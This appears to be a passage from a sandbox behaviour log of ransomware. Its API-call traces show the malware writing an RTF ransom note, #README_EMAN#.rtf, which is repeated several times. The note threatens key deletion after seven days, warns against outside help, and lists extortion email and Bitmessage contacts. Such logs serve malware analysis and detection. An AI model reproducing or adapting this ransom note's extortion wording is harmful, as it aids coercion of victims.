in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x97\x03\x1a»oo¸«¤ÊK¨\n\x02ÈG,ÈàZÿ\x95\x99\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0285.247] WriteFile (in: hFile=0x294, lpBuffer=0x236fd38*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236fd38*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.248] CloseHandle (hObject=0x294) returned 1 [0285.248] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0285.248] GetLastError () returned 0x2 [0285.248] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.250] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.250] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.250] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only 